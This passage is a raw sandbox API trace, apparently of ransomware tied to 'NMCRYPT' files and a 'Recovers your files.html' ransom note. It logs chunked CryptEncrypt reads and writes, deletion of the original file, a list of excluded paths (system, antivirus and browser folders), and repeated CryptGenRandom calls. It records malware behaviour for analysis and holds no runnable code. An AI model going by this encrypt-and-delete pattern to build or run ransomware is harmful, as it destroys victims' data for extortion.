lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.776] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.776] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.776] GetLastError () returned 0x0 [0165.776] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0xc6, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0xc6, lpOverlapped=0x0) returned 1 [0165.777] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xc6, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xd0) returned 1 [0165.777] GetLastError () returned 0x0 [0165.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xd0, lpOverlapped=0x0) returned 1 [0165.777] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0165.777] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.777] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg") returned 1 [0165.777] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg")) returned 0 [0165.778] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" [0165.778] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.778] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB11.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb11.tmp")) returned 0xfb11 [0165.778] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB11.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb11.tmp"), dwFlags=0x1) returned 0 [0165.778] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFB11.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfb11.tmp")) returned 1 [0165.779] CryptDestroyKey (hKey=0x9ad678) returned 1 [0165.779] wcslen (_String="OK") returned 0x2 [0165.779] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.779] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.779] CryptDestroyKey (hKey=0x9ad138) returned 1 [0165.779] CryptDestroyHash (hHash=0x9ad338) returned 1 [0165.779] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*NMCRYPT") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*Recovers your files.html") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.exe") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.dll") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.lnk") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.bat") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.ini") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.msi") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*.scf") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*pagefile.sys*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*NTUSER.DAT*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*AppData*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\winrar\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\java\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\windows\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\ESET\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\AVG\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\AVIRA\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*Atheros*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*Realtek*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*bootmgr*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*boot*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*boot*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*CONFIG.SYS*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*IO.SYS*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*MSDOS.SYS*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*NTDETECT.COM*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*ntldr*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*chrome*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*opera*") returned 0 [0165.779] PathMatchSpecW (pszFile="Soft Blue.htm", pszSpec="*firefox*") returned 0 [0165.779] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm", pszSpec="*") returned 1 [0165.780] strlen (_Str="NMoreira") returned 0x8 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.780] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.781] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.782] CryptGenRandom (in: hProv=0x8bf310, 